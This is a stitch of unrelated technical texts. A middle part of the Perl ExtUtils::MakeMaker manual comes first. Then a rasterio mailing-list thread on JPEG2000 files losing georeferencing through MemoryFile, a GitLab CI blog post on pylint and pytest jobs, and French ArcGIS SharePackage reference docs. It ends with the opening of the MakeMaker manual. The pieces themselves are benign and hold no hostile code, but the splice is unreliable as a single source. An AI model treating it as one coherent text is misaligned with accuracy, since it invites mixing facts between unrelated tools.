A sanitized VERSION with . replaced by _. For places where . has special meaning (some filesystems, RCS labels, etc...)
Hashref of .xs files. MakeMaker will default this. e.g.
{'name_of_file.xs' => 'name_of_file.c'}
The .c files will automatically be included in the list of files deleted by a make clean.
String of options to pass to xsubpp. This might include -C++ or -extern. Do not include typemaps here; the TYPEMAP parameter exists for that purpose.
May be set to -protoypes, -noprototypes or the empty string. The empty string is equivalent to the xsubpp default, or -noprototypes. See the xsubpp documentation for details. MakeMaker defaults to the empty string.
Your version number for the .xs file of this package. This defaults to the value of the VERSION attribute.
can be used to pass parameters to the methods which implement that part of the Makefile. Parameters are specified as a hash ref but are passed to the method as a hash.
{FILES => "*.xyz foo"}
{ANY_TARGET => ANY_DEPENDENCY, ...}
(ANY_TARGET must not be given a double-colon rule by MakeMaker.)
{TARFLAGS => 'cvfF', COMPRESS => 'gzip', SUFFIX => '.gz',
SHAR => 'shar -m', DIST_CP => 'ln', ZIP => '/bin/zip',
ZIPFLAGS => '-rl', DIST_DEFAULT => 'private tardist' }
If you specify COMPRESS, then SUFFIX should also be altered, as it is needed to tell make the target file of the compression. Setting DIST_CP to ln can be useful, if you need to preserve the timestamps on your files. DIST_CP can take the values 'cp', which copies the file, 'ln', which links the file, and 'best' which copies symbolic links and links the rest. Default is 'best'.
{ARMAYBE => 'ar', OTHERLDFLAGS => '...', INST_DYNAMIC_DEP => '...'}
{LINKTYPE => 'static', 'dynamic' or ''}
NB: Extensions that have nothing but *.pm files had to say
{LINKTYPE => ''}
with Pre-5.0 MakeMakers. Since version 5.00 of MakeMaker such a line can be deleted safely. MakeMaker recognizes when there's nothing to be linked.
{ANY_MACRO => ANY_VALUE, ...}
Anything put here will be passed to MY::postamble() if you have one.
{FILES => '$(INST_ARCHAUTODIR)/*.xyz'}
Specify the targets for testing.
{TESTS => 't/*.t'}
RECURSIVE_TEST_FILES can be used to include all directories recursively under t that contain .t files. It will be ignored if you provide your own TESTS attribute, defaults to false.
{RECURSIVE_TEST_FILES=>1}
{MAXLEN => 8}
If you cannot achieve the desired Makefile behaviour by specifying attributes you may define private subroutines in the Makefile.PL. Each subroutine returns the text it wishes to have written to the Makefile. To override a section of the Makefile you can either say:
sub MY::c_o { "new literal text" }
or you can edit the default by saying something like:
package MY; # so that "SUPER" works right
sub c_o {
my $inherited = shift->SUPER::c_o(@_);
$inherited =~ s/old text/new text/;
$inherited;
}
If you are running experiments with embedding perl as a library into other applications, you might find MakeMaker is not sufficient. You'd better have a look at ExtUtils::Embed which is a collection of utilities for embedding.
If you still need a different solution, try to develop another subroutine that fits your needs and submit the diffs to makemaker@perl.org
For a complete description of all MakeMaker methods see ExtUtils::MM_Unix.
Here is a simple example of how to add a new target to the generated Makefile:
sub MY::postamble {
return <<'MAKE_FRAG';
$(MYEXTLIB): sdbm/Makefile
cd sdbm && $(MAKE) all
MAKE_FRAG
}
WriteMakefile() now does some basic sanity checks on its parameters to protect against typos and malformatted values. This means some things which happened to work in the past will now throw warnings and possibly produce internal errors.
Some of the most common mistakes:
MAN3PODS => ' '
This is commonly used to suppress the creation of man pages. MAN3PODS takes a hash ref not a string, but the above worked by accident in old versions of MakeMaker.
The correct code is MAN3PODS => { }.
MakeMaker.pm uses the architecture-specific information from Config.pm. In addition it evaluates architecture specific hints files in a hints/ directory. The hints files are expected to be named like their counterparts in PERL_SRC/hints, but with an .pl file name extension (eg. next_3_2.pl). They are simply evaled by MakeMaker within the WriteMakefile() subroutine, and can be used to execute commands as well as to include special variables. The rules which hintsfile is chosen are the same as in Configure.
The hintsfile is eval()ed immediately after the arguments given to WriteMakefile are stuffed into a hash reference $self but before this reference becomes blessed. So if you want to do the equivalent to override or create an attribute you would say something like
$self->{LIBS} = ['-ldbm -lucb -lc'];
For authors of extensions MakeMaker provides several Makefile targets. Most of the support comes from the ExtUtils::Manifest module, where additional documentation can be found.
reports which files are below the build directory but not in the MANIFEST file and vice versa. (See ExtUtils::Manifest::fullcheck() for details)
reports which files are skipped due to the entries in the MANIFEST.SKIP file (See ExtUtils::Manifest::skipcheck() for details)
does a realclean first and then the distcheck. Note that this is not needed to build a new distribution as long as you are sure that the MANIFEST file is ok.
does a realclean first and then removes backup files such as *~, *.bak, *.old and *.orig
rewrites the MANIFEST file, adding all remaining files found (See ExtUtils::Manifest::mkmanifest() for details)
Copies all the files that are in the MANIFEST file to a newly created directory with the name $(DISTNAME)-$(VERSION). If that directory exists, it will be removed first.
Additionally, it will create META.yml and META.json module meta-data file in the distdir and add this to the distdir's MANIFEST. You can shut this behavior off with the NO_META flag.
Makes a distdir first, and runs a perl Makefile.PL, a make, and a make test in that directory.
First does a distdir. Then a command $(PREOP) which defaults to a null command, followed by $(TO_UNIX), which defaults to a null command under UNIX, and will convert files in distribution directory to UNIX format otherwise. Next it runs tar on that directory into a tarfile and deletes the directory. Finishes with a command $(POSTOP) which defaults to a null command.
Defaults to $(DIST_DEFAULT) which in turn defaults to tardist.
Runs a tardist first and uuencodes the tarfile.
First does a distdir. Then a command $(PREOP) which defaults to a null command. Next it runs shar on that directory into a sharfile and deletes the intermediate directory again. Finishes with a command $(POSTOP) which defaults to a null command. Note: For shdist to work properly a shar program that can handle directories is mandatory.
First does a distdir. Then a command $(PREOP) which defaults to a null command. Runs $(ZIP) $(ZIPFLAGS) on that directory into a zipfile. Then deletes that directory. Finishes with a command $(POSTOP) which defaults to a null command.
Does a $(CI) and a $(RCS_LABEL) on all files in the MANIFEST file.
Customization of the dist targets can be done by specifying a hash reference to the dist attribute of the WriteMakefile call. The following parameters are recognized:
CI ('ci -u')
COMPRESS ('gzip --best')
POSTOP ('@ :')
PREOP ('@ :')
TO_UNIX (depends on the system)
RCS_LABEL ('rcs -q -Nv$(VERSION_SYM):')
SHAR ('shar')
SUFFIX ('.gz')
TAR ('tar')
TARFLAGS ('cvf')
ZIP ('zip')
ZIPFLAGS ('-r')
An example:
WriteMakefile(
...other options...
dist => {
COMPRESS => "bzip2",
SUFFIX => ".bz2"
}
);
Long plaguing users of MakeMaker based modules has been the problem of getting basic information about the module out of the sources without running the Makefile.PL and doing a bunch of messy heuristics on the resulting Makefile. Over the years, it has become standard to keep this information in one or more CPAN Meta files distributed with each distribution.
The original format of CPAN Meta files was YAML and the corresponding file was called META.yml. In 2010, version 2 of the CPAN::Meta::Spec was released, which mandates JSON format for the metadata in order to overcome certain compatibility issues between YAML serializers and to avoid breaking older clients unable to handle a new version of the spec. The CPAN::Meta library is now standard for accessing old and new-style Meta files.
If CPAN::Meta is installed, MakeMaker will automatically generate META.json and META.yml files for you and add them to your MANIFEST as part of the 'distdir' target (and thus the 'dist' target). This is intended to seamlessly and rapidly populate CPAN with module meta-data. If you wish to shut this feature off, set the NO_META WriteMakefile() flag to true.
At the 2008 QA Hackathon in Oslo, Perl module toolchain maintainers agrees to use the CPAN Meta format to communicate post-configuration requirements between toolchain components. These files, MYMETA.json and MYMETA.yml, are generated when Makefile.PL generates a Makefile (if CPAN::Meta is installed). Clients like CPAN or CPANPLUS will read this files to see what prerequisites must be fulfilled before building or testing the distribution. If you with to shut this feature off, set the NO_MYMETA WriteMakeFile() flag to true.
If some events detected in Makefile.PL imply that there is no way to create the Module, but this is a normal state of things, then you can create a Makefile which does nothing, but succeeds on all the "usual" build targets. To do so, use
use ExtUtils::MakeMaker qw(WriteEmptyMakefile);
WriteEmptyMakefile();
instead of WriteMakefile().
This may be useful if other modules expect this module to be built OK, as opposed to work OK (say, this system-dependent module builds in a subdirectory of some other distribution, or is listed as a dependency in a CPAN::Bundle, but the functionality is supported by different means on the current architecture).
my $value = prompt($message);
my $value = prompt($message, $default);
The prompt() function provides an easy way to request user input used to write a makefile. It displays the $message as a prompt for input. If a $default is provided it will be used as a default. The function returns the $value selected by the user.
If prompt() detects that it is not running interactively and there is nothing on STDIN or if the PERL_MM_USE_DEFAULT environment variable is set to true, the $default will be used without prompting. This prevents automated processes from blocking on user input.
If no $default is provided an empty string will be used instead.
Command line options used by MakeMaker->new(), and thus by WriteMakefile(). The string is split as the shell would, and the result is processed before any actual command line arguments are processed.
PERL_MM_OPT='CCFLAGS="-Wl,-rpath -Wl,/foo/bar/lib" LIBS="-lwibble -lwobble"'
If set to a true value then MakeMaker's prompt function will always return the default without waiting for user input.
Same as the PERL_CORE parameter. The parameter overrides this.
Module::Build is a pure-Perl alternative to MakeMaker which does not rely on make or any other external utility. It is easier to extend to suit your needs.
Module::Install is a wrapper around MakeMaker which adds features not normally available.
Andy Dougherty doughera@lafayette.edu, Andreas König andreas.koenig@mind.de, Tim Bunce timb@cpan.org. VMS support by Charles Bailey bailey@newman.upenn.edu. OS/2 support by Ilya Zakharevich ilya@math.ohio-state.edu.
Currently maintained by Michael G Schwern schwern@pobox.com
Send patches and ideas to makemaker@perl.org.
Send bug reports via http://rt.cpan.org/. Please send your generated Makefile along with your report.
For more up-to-date information, see https://metacpan.org/release/ExtUtils-MakeMaker.
Repository available at https://github.com/Perl-Toolchain-Gang/ExtUtils-MakeMaker.
This program is free software; you can redistribute it and/or modify it under the same terms as Perl itself.
|
MemoryFile loses Profile information
ciaran.evans@...
Hi there,
I'm currently re-writing a process that was stacking .jp2 bands into one image and writing the resultant stack to disk.
I'm moving this up to AWS so want to use MemoryFile's instead.
My code looks something like:
s3_r = boto3.resource('s3')
If I download that image and open it in QGIS, the image has no geo-coding at all.
If I process the same image, but write to disk like:
profile = source_image.profile.copy()
I get a geo-coded image and it appears where I'd expect.
ciaran.evans@...
On further inspection, when I switched to saving my outputs as GeoTIFF, the resultant images are both geo-coded fine (Disk vs. In Memory to S3).
I'm guessing something is going wrong when
Any suggestions on next steps?
ciaran.evans@...
Revised: Don't require the
s3_r = boto3.resource('s3')
profile = source_image.profile.copy()
with rasterio.io.MemoryFile() as stack:
with stack.open(**profile) as stack_out:
stack_out.write(source_image.read(1), 1)
s3_r.Object(<my-bucket>, <my-key>).upload_fileobj(stack)
For reference, doing:
s3_r = boto3.resource('s3')
profile = source_image.profile.copy()
with rasterio.io.MemoryFile() as stack:
profile['driver'] = 'GTiff'
with stack.open(**profile) as stack_out:
stack_out.write(source_image.read(1), 1)
s3_r.Object(<my-bucket>, <my-key>).upload_fileobj(stack)
results in a correctly geocoded GeoTiff. Appears it is an issue with
vincent.sarago@...
I can confirm that writing a Jpeg2000 from memory losses the geo information
toggle quoted messageShow quoted text
ciaran.evans@...
I tried this with GDAL 2.4.2 and GDAL 3.0 too
If anyone can point me to where I might look further to diagnose this, I can create an issue with some useful info, whether that's in Rasterio/GDAL :)
Sean Gillies
Hi,
On Tue, Apr 28, 2020 at 8:02 AM <ciaran.evans@...> wrote:
To confirm: you're right, there's no need to seek after writing using mem.write() because the dataset API doesn't change the MemoryFile's stream position. It remains at 0, the beginning of the file.
Is it possible that your B01.jp2 has auxiliary files? If so, they can be lost because MemoryFile.read() only returns bytes from the primary file and will overlook auxiliaries. For example, see the code below using rasterio's test data.
$ rio insp tests/data/RGB.byte.tif
>>> from rasterio.io import MemoryFile
>>> profile = src.profile
>>> del profile["tiled"]
>>> del profile["interleave"]
>>> profile["driver"] = "PNG"
>>> with MemoryFile(filename="lolwut.png") as memfile:
... with memfile.open(**profile) as dataset_1:
... dataset_1.write(src.read())
... print(dataset_1.files)
... print(dataset_1.profile)
... with memfile.open() as dataset_2:
... print(dataset_2.files)
... print(dataset_2.profile)
... with open("/tmp/lolwut.png", "wb") as f:
... f.write(memfile.read())
... with rasterio.open("/tmp/lolwut.png") as dataset_3:
... print(dataset_3.files)
... print(dataset_3.profile)
...
[]
{'driver': 'PNG', 'dtype': 'uint8', 'nodata': 0.0, 'width': 791, 'height': 718, 'count': 3, 'crs': CRS.from_epsg(32618), 'transform': Affine(300.0379266750948, 0.0, 101985.0,
0.0, -300.041782729805, 2826915.0), 'tiled': False}
['/vsimem/lolwut.png', '/vsimem/lolwut.png.aux.xml']
{'driver': 'PNG', 'dtype': 'uint8', 'nodata': 0.0, 'width': 791, 'height': 718, 'count': 3, 'crs': CRS.from_epsg(32618), 'transform': Affine(300.0379266750948, 0.0, 101985.0,
0.0, -300.041782729805, 2826915.0), 'tiled': False, 'interleave': 'pixel'}
775558
['/tmp/lolwut.png']
{'driver': 'PNG', 'dtype': 'uint8', 'nodata': 0.0, 'width': 791, 'height': 718, 'count': 3, 'crs': None, 'transform': Affine(1.0, 0.0, 0.0,
0.0, 1.0, 0.0), 'tiled': False, 'interleave': 'pixel'}
dataset_1.files is an empty list because no files are written to the /vsimem virtual filesystem until dataset_1 is closed.
dataset_2.files show two files: the primary /vsimem/lolwut.png file and its auxiliary '/vsimem/lolwut.png.aux.xml' file, containing the georeferencing information.
dataset_3.files shows only one file, the auxiliary file has been lost by memfile.read(). MemoryFile isn't any good for multiple-file formats or multiple-file format variants. It's fine for a profile of GeoTIFFs that keep their georeferencing and masks and overviews in a single file.
Sean Gillies
Guillaume Lostis
Hi,
I guess the B01.jp2 file mentioned is a Sentinel-2 band, which is standalone, there is no side-car file attached to it.
I have tried downloading a single B01.jp2 file from a SAFE and running Vincent Sarago's snippet on it and I get the same result, the CRS and transform are lost when the jp2 is written through a MemoryFile.
Guillaume Lostis
ciaran.evans@...
As with Guillaume's answer, it's a Sentinel 2 band and has no side-car file, when I write straight to a file, the georeferencing is maintained.
Sean Gillies
On Wed, Apr 29, 2020 at 1:38 AM <ciaran.evans@...> wrote:
Since there's no JP2 specific code in MemoryFile and things work with the GeoTIFF driver, I suspect there's a subtle bug involving the vsimem system and one of the JP2 drivers. It would be useful to try to reproduce this with GDAL's Python bindings, but I don't have them installed and won't be able to try that.
Sean Gillies
ciaran.evans@...
Would you say it's worth raising an issue on GDAL then?
I'm also not familiar with the Python GDAL bindings, Rasterio is my window in that haha.
Guillaume Lostis
Like Ciaran I'm not very familiar with GDAL's python bindings, but I've tried running a little snippet which I believe does the same thing as what was done with
from osgeo import gdal
mem, out = "/vsimem/B01.jp2", "new_B01.jp2"
gdal.Translate(mem, "B01.jp2")
# Taken from https://lists.osgeo.org/pipermail/gdal-dev/2016-August/045030.html
f = gdal.VSIFOpenL(mem, "rb")
gdal.VSIFSeekL(f, 0, 2) # seek to end
size = gdal.VSIFTellL(f)
gdal.VSIFSeekL(f, 0, 0) # seek to beginning
data = gdal.VSIFReadL(1, size, f)
gdal.Unlink(mem)
with open(out, "wb") as ff:
ff.write(data)
When I look at the
(Side note: Interestingly enough, the pixel values of
Guillaume
Even Rouault
On mercredi 29 avril 2020 08:40:07 CEST Guillaume Lostis wrote:
> Like Ciaran I'm not very familiar with GDAL's python bindings, but I've
> tried running a little snippet which I believe does the same thing as what
> was done with `rasterio`: it writes a JP2 to a `vsimem` in-memory file, and
> then writes the bytes to a file on disk.
>
> ```python
> from osgeo import gdal
>
> mem, out = "/vsimem/B01.jp2", "new_B01.jp2"
> gdal.Translate(mem, "B01.jp2")
>
> # Taken from
> https://lists.osgeo.org/pipermail/gdal-dev/2016-August/045030.html f =
> gdal.VSIFOpenL(mem, "rb")
> gdal.VSIFSeekL(f, 0, 2) # seek to end
> size = gdal.VSIFTellL(f)
> gdal.VSIFSeekL(f, 0, 0) # seek to beginning
> data = gdal.VSIFReadL(1, size, f)
> gdal.Unlink(mem)
>
> with open(out, "wb") as ff:
> ff.write(data)
> ```
>
> When I look at the `gdalinfo` of `new_B01.jp2`, it has a CRS and a
> transform, so I am not able to reproduce the behavior we have with
> `rasterio`.
>
> (Side note: Interestingly enough, the pixel values of `new_B01.jp2` have
> slightly changed with respect to the original `B01.jp2` file, so there is
> some data loss somewhere in the process. But maybe that is expected of the
> JP2 format and could be avoided by passing extra arguments to
> `gdal.Translate`?
By default, the JP2OpenJPEG driver uses a lossy compression (my personal take on JPEG2000 is that it has very limited interested when used in its lossless profile. Better use more conventional algorithms that are way faster).
See https://gdal.org/drivers/raster/jp2openjpeg.html#lossless-compression for options to pass to get a lossless JPEG2000 as output.
So all in all that should be something like
gdal.Translate(mem, "B01.jp2",
format = "JP2OpenJPEG", # in case you have several JP2K drivers available
options = ["REVERSIBLE=YES", "QUALITY=100"])
--
Spatialys - Geospatial professional services
http://www.spatialys.com
Sean Gillies
Hi,
On Wed, Apr 29, 2020 at 9:40 AM Guillaume Lostis <g.lostis@...> wrote:
I've only now remembered (not being a regular jp2 user) that JPEG2000 is a create-copy format (see https://gdal.org/drivers/raster/index.html) and as such is not suited for uses cases like
with rasterio.open("file.jp2", "w", driver="JP2OpenJPEG", ...) as dataset:
dataset.write(data)
Rasterio tries to abstract over the differences between "create" and "create-copy" formats, but might falter in some cases. We're testing JPEG and PNG in the test suite, but not JPEG2000. If you're constructing a dataset from the bands of multiple other datasets, you should probably be using GeoTIFF as a format, it's well suited for this. And then convert to JPEG2000 before uploading to S3 using rasterio.shutil.copy, which calls on GDAL's GDALCreateCopy and is mostly equivalent to gdal_translate.
Sean Gillies
ciaran.evans@...
I think the problem is that I'm trying to do the conversion in memory, not on disk. If I've read your latest reply correctly, I'd convert to JPEG2000 on disk and then copy to S3?
Can I do the conversion via rasterio.shutil.copy in memory?
|
Mar 6, 2019 by Thibault | 10166 views
Whatever programming language your are using for your project, GitLab continuous integration system (gitlab-ci) is a fantastic tool that allows you to automatically run tests when code is pushed to your repository. Java, PHP, Go, Python or even LaTeX, no limit here! In this blog post we review a few examples for the Python programming language.
In GitLab, the different tests are called jobs. These jobs are executed by a gitlab-runner, that can be installed on the same server as you main GitLab, or on one or multiple separate servers.
Different options exist to run the jobs: using VirtualBox virtual machines, using Docker containers or using no virtualization at all. Most administrators configure gitlab-runner to run jobs using Docker images. This is also what we will assume for the remainder of this post.
To automatically check your code when you push to your repository, add a file called .gitlab-ci.yml at the root of your project with following content:
test:pylint:
image: python:3.6
script:
- pip install pylint --quiet
- pylint --ignored-classes=_socketobject *.py
test:pylint is simply the name of the job. You can choose whatever you want. The rest of the code indicates that gitlab-runner should use the docker image python:3.6, and run the mentioned commands.
When using some external classes (like sockets), PyLint may complain that the used method does not exist, although the method does actually exist. You can ignore these errors by appending --ignored-classes=... to the pylint command line.
You can also specify a directory (instead of *.py), but it must be a Python module and include __init__.py.
Good to know: Pylint is shipped with Pyreverse which creates UML diagrams from python code.
PyTest is a framework designed to help you test your Python code. Here is an example of a test:
# content of test_sample.py
def func(x):
return x + 1
def test_answer():
assert func(3) == 5
To run these tests automatically when you push code to your repository, add the following job to your .gitlab-ci.yml.
test:pytest: image: python:3.6 script: - pip install pytest --quiet - pytest
pytest will automatically discover all test files in your project (all files named test_*.py or *_test.py) and execute them.
One of the main benefits of automatic testing with gitlab-ci is that your can test multiple versions of Python at the same time. There is however one caveat: if you plan to test your code with both Python 2 and Python 3, you will at least need to disable the superfluous-parens test in Python 2 (for the print statement, that became a function in Python 3). Here is a full example of .gitlab-ci.yml :
test:pylint:36:
image: python:3.6
script:
- pip install pylint --quiet
- pylint --ignored-classes=_socketobject *.py
test:pytest:36:
image: python:3.6
script:
- pip install pytest --quiet
- pytest
test:pylint:27:
image: python:2.7
script:
- pip install pylint --quiet
- pylint --disable superfluous-parens --ignored-classes=_socketobject *.py
test:pytest:27:
image: python:2.7
script:
- pip install pytest --quiet
- pytest
|
Résumé
Permet de partager un paquetage en le téléchargeant sur ArcGIS Online.
Utilisation
Les types de paquetage pris en charge sont les suivants :
paquetages de géotraitement (.gpk)
paquetages de couche (.lpk)
paquetages de localisateurs (.gcpk)
paquetages de carte (.mpk)
paquetages de tuiles de carte (.tpk)
Pour partager un paquetage sur ArcGIS Online, votre compte global Esri doit être inscrit en tant que membre d'ArcGIS Online. Pour créer un compte global Esri et l'inscrire, accédez au site http://www.arcgis.com/home/signup.html
Pour partager un paquetage avec ArcGIS Online, un résumé et des balises sont requis. Le résumé et les balises requis, ainsi que la description facultative du paquetage et les crédits permettent de rechercher des paquetages en ligne.
Si un paquetage portant ce nom existe déjà sur ArcGIS Online, il est remplacé.
Syntaxe
SharePackage(in_package, username, password, summary, tags, {credits}, {public}, {groups})
Paramètre Explication Type de données
in_package
Fichier de paquetage de couche en entrée (.lpk), de carte (.mpk), de géotraitement (.gpk), de tuile de carte (.tpk) ou de localisateur d’adresses (.gcpk).
File
username
Nom d'utilisateur du compte global Esri. L'utilisation de ce paramètre sera limitée dans un script Python lors du partage d'un paquetage sur un portail requérant une authentification OAUTH2. Pour en savoir plus, reportez-vous aux remarques d'utilisation.
String
password
Mot de passe du compte global Esri. L'utilisation de ce paramètre sera limitée dans un script Python lors du partage d'un paquetage sur un portail requérant une authentification OAUTH2. Pour en savoir plus, reportez-vous aux remarques d'utilisation.
Encrypted String
summary
Résumé du paquetage. Le résumé est affiché dans les informations d'élément du paquetage sur ArcGIS.com.
String
tags
Balises utilisées pour décrire et identifier le paquetage. Les balises individuelles sont séparées à l'aide d'une virgule ou d'un point-virgule.
String
credits
(Facultatif)
Crédits pour le paquetage. Il s'agit en général du nom de l'organisation qui a les crédits nécessaires pour créer et fournir du contenu pour le paquetage.
String
public
(Facultatif)
Spécifie si le paquetage en entrée est partagé et accessible à tout le monde.
Boolean
groups
[group_name,...]
(Facultatif)
Liste des groupes avec lesquels partager le paquetage.
String
Sortie dérivée
Nom Explication Type de données
out_results
Indique si le paquetage a été partagé avec succès.
Booléen
Exemple de code
Exemple 1 d'utilisation de l'outil SharePackage (fenêtre Python)
Exemple de code prenant un paquetage de couches et le partageant sur ArcGIS Online.
import arcpy arcpy.SharePackage_management(r"C:\states.lpk", "username", "password", "this is a summary", "tag1, tag2", "Credits", "MYGROUPS", "My_Group")
Exemple 2 d'utilisation de l'outil SharePackage (script Python autonome)
Trouve tous les paquetages de carte qui résident dans un dossier spécifié et les partage sur ArcGIS Online.
# Name: SharePackageExample.py # Description: Find all the map packages that reside in a specified folder and share them on ArcGIS online. # import system modules import arcpy # Set environment settings arcpy.env.overwriteOutput = True arcpy.env.workspace = "C:/data/my_packages" # Loop through the workspace, find all the layer and map packages for mpk in arcpy.ListFiles("*.mpk"): print("Sharing " + mpk) arcpy.SharePackage_management(mpk, "username", "password", "This is a summary", "tag1, tag2", "Credits", "MYGROUPS","My_Group")
Environnements
Informations de licence
Basic: Oui
Standard: Oui
Advanced: Oui
|
ExtUtils::MakeMaker - Create a module Makefile
use ExtUtils::MakeMaker;
WriteMakefile(
NAME => "Foo::Bar",
VERSION_FROM => "lib/Foo/Bar.pm",
);
This utility is designed to write a Makefile for an extension module from a Makefile.PL. It is based on the Makefile.SH model provided by Andy Dougherty and the perl5-porters.
It splits the task of generating the Makefile into several subroutines that can be individually overridden. Each subroutine returns the text it wishes to have written to the Makefile.
As there are various Make programs with incompatible syntax, which use operating system shells, again with incompatible syntax, it is important for users of this module to know which flavour of Make a Makefile has been written for so they'll use the correct one and won't have to face the possibly bewildering errors resulting from using the wrong one.
On POSIX systems, that program will likely be GNU Make; on Microsoft Windows, it will be either Microsoft NMake, DMake or GNU Make. See the section on the "MAKE" parameter for details.
ExtUtils::MakeMaker (EUMM) is object oriented. Each directory below the current directory that contains a Makefile.PL is treated as a separate object. This makes it possible to write an unlimited number of Makefiles with a single invocation of WriteMakefile().
All inputs to WriteMakefile are Unicode characters, not just octets. EUMM seeks to handle all of these correctly. It is currently still not possible to portably use Unicode characters in module names, because this requires Perl to handle Unicode filenames, which is not yet the case on Windows.
The long answer is the rest of the manpage :-)
The generated Makefile enables the user of the extension to invoke
perl Makefile.PL # optionally "perl Makefile.PL verbose"
make
make test # optionally set TEST_VERBOSE=1
make install # See below
The Makefile to be produced may be altered by adding arguments of the form KEY=VALUE. E.g.
perl Makefile.PL INSTALL_BASE=~
Other interesting targets in the generated Makefile are
make config # to check if the Makefile is up-to-date
make clean # delete local temp files (Makefile gets renamed)
make realclean # delete derived files (including ./blib)
make ci # check in all the files in the MANIFEST file
make dist # see below the Distribution Support section
MakeMaker checks for the existence of a file named test.pl in the current directory, and if it exists it executes the script with the proper set of perl -I options.
MakeMaker also checks for any files matching glob("t/*.t"). It will execute all matching files in alphabetical order via the Test::Harness module with the -I switches set correctly.
If you'd like to see the raw output of your tests, set the TEST_VERBOSE variable to true.
make test TEST_VERBOSE=1
If you want to run particular test files, set the TEST_FILES variable. It is possible to use globbing with this mechanism.
make test TEST_FILES='t/foobar.t t/dagobah*.t'
Windows users who are using nmake should note that due to a bug in nmake, when specifying TEST_FILES you must use back-slashes instead of forward-slashes.
nmake test TEST_FILES='t\foobar.t t\dagobah*.t'
A useful variation of the above is the target testdb. It runs the test under the Perl debugger (see perldebug). If the file test.pl exists in the current directory, it is used for the test.
If you want to debug some other testfile, set the TEST_FILE variable thusly:
make testdb TEST_FILE=t/mytest.t
By default the debugger is called using -d option to perl. If you want to specify some other option, set the TESTDB_SW variable:
make testdb TESTDB_SW=-Dx
make alone puts all relevant files into directories that are named by the macros INST_LIB, INST_ARCHLIB, INST_SCRIPT, INST_MAN1DIR and INST_MAN3DIR. All these default to something below ./blib if you are not building below the perl source directory. If you are building below the perl source, INST_LIB and INST_ARCHLIB default to ../../lib, and INST_SCRIPT is not defined.
The install target of the generated Makefile copies the files found below each of the INST_* directories to their INSTALL* counterparts. Which counterparts are chosen depends on the setting of INSTALLDIRS according to the following table:
INSTALLDIRS set to perl site vendor PERLPREFIX SITEPREFIX VENDORPREFIXINST_ARCHLIB INSTALLARCHLIB INSTALLSITEARCH INSTALLVENDORARCHINST_LIB INSTALLPRIVLIB INSTALLSITELIB INSTALLVENDORLIBINST_BIN INSTALLBIN INSTALLSITEBIN INSTALLVENDORBININST_SCRIPT INSTALLSCRIPT INSTALLSITESCRIPT INSTALLVENDORSCRIPTINST_MAN1DIR INSTALLMAN1DIR INSTALLSITEMAN1DIR INSTALLVENDORMAN1DIRINST_MAN3DIR INSTALLMAN3DIR INSTALLSITEMAN3DIR INSTALLVENDORMAN3DIR
The INSTALL... macros in turn default to their %Config ($Config{installprivlib}, $Config{installarchlib}, etc.) counterparts.
You can check the values of these variables on your system with
perl '-V:install.*'
And to check the sequence in which the library directories are searched by perl, run
perl -le 'print join $/, @INC'
Sometimes older versions of the module you're installing live in other directories in @INC. Because Perl loads the first version of a module it finds, not the newest, you might accidentally get one of these older versions even after installing a brand new version. To delete all other versions of the module you're installing (not simply older ones) set the UNINST variable.
make install UNINST=1
INSTALL_BASE can be passed into Makefile.PL to change where your module will be installed. INSTALL_BASE is more like what everyone else calls "prefix" than PREFIX is.
To have everything installed in your home directory, do the following.
# Unix users, INSTALL_BASE=~ works fine
perl Makefile.PL INSTALL_BASE=/path/to/your/home/dir
Like PREFIX, it sets several INSTALL* attributes at once. Unlike PREFIX it is easy to predict where the module will end up. The installation pattern looks like this:
INSTALLARCHLIB INSTALL_BASE/lib/perl5/$Config{archname}
INSTALLPRIVLIB INSTALL_BASE/lib/perl5
INSTALLBIN INSTALL_BASE/bin
INSTALLSCRIPT INSTALL_BASE/bin
INSTALLMAN1DIR INSTALL_BASE/man/man1
INSTALLMAN3DIR INSTALL_BASE/man/man3
INSTALL_BASE in MakeMaker and --install_base in Module::Build (as of 0.28) install to the same location. If you want MakeMaker and Module::Build to install to the same location simply set INSTALL_BASE and --install_base to the same location.
INSTALL_BASE was added in 6.31.
PREFIX and LIB can be used to set several INSTALL* attributes in one go. Here's an example for installing into your home directory.
# Unix users, PREFIX=~ works fine
perl Makefile.PL PREFIX=/path/to/your/home/dir
This will install all files in the module under your home directory, with man pages and libraries going into an appropriate place (usually ~/man and ~/lib). How the exact location is determined is complicated and depends on how your Perl was configured. INSTALL_BASE works more like what other build systems call "prefix" than PREFIX and we recommend you use that instead.
Another way to specify many INSTALL directories with a single parameter is LIB.
perl Makefile.PL LIB=~/lib
This will install the module's architecture-independent files into ~/lib, the architecture-dependent files into ~/lib/$archname.
Note, that in both cases the tilde expansion is done by MakeMaker, not by perl by default, nor by make.
Conflicts between parameters LIB, PREFIX and the various INSTALL* arguments are resolved so that:
setting LIB overrides any setting of INSTALLPRIVLIB, INSTALLARCHLIB, INSTALLSITELIB, INSTALLSITEARCH (and they are not affected by PREFIX);
without LIB, setting PREFIX replaces the initial $Config{prefix} part of those INSTALL* arguments, even if the latter are explicitly set (but are set to still start with $Config{prefix}).
If the user has superuser privileges, and is not working on AFS or relatives, then the defaults for INSTALLPRIVLIB, INSTALLARCHLIB, INSTALLSCRIPT, etc. will be appropriate, and this incantation will be the best:
perl Makefile.PL;
make;
make test
make install
make install by default writes some documentation of what has been done into the file $(INSTALLARCHLIB)/perllocal.pod. This feature can be bypassed by calling make pure_install.
will have to specify the installation directories as these most probably have changed since perl itself has been installed. They will have to do this by calling
perl Makefile.PL INSTALLSITELIB=/afs/here/today \
INSTALLSCRIPT=/afs/there/now INSTALLMAN3DIR=/afs/for/manpages
make
Be careful to repeat this procedure every time you recompile an extension, unless you are sure the AFS installation directories are still valid.
An extension that is built with the above steps is ready to use on systems supporting dynamic loading. On systems that do not support dynamic loading, any newly created extension has to be linked together with the available resources. MakeMaker supports the linking process by creating appropriate targets in the Makefile whenever an extension is built. You can invoke the corresponding section of the makefile with
make perl
That produces a new perl binary in the current directory with all extensions linked in that can be found in INST_ARCHLIB, SITELIBEXP, and PERL_ARCHLIB. To do that, MakeMaker writes a new Makefile, on UNIX, this is called Makefile.aperl (may be system dependent). If you want to force the creation of a new perl, it is recommended that you delete this Makefile.aperl, so the directories are searched through for linkable libraries again.
The binary can be installed into the directory where perl normally resides on your machine with
make inst_perl
To produce a perl binary with a different name than perl, either say
perl Makefile.PL MAP_TARGET=myperl
make myperl
make inst_perl
or say
perl Makefile.PL
make myperl MAP_TARGET=myperl
make inst_perl MAP_TARGET=myperl
In any case you will be prompted with the correct invocation of the inst_perl target that installs the new binary into INSTALLBIN.
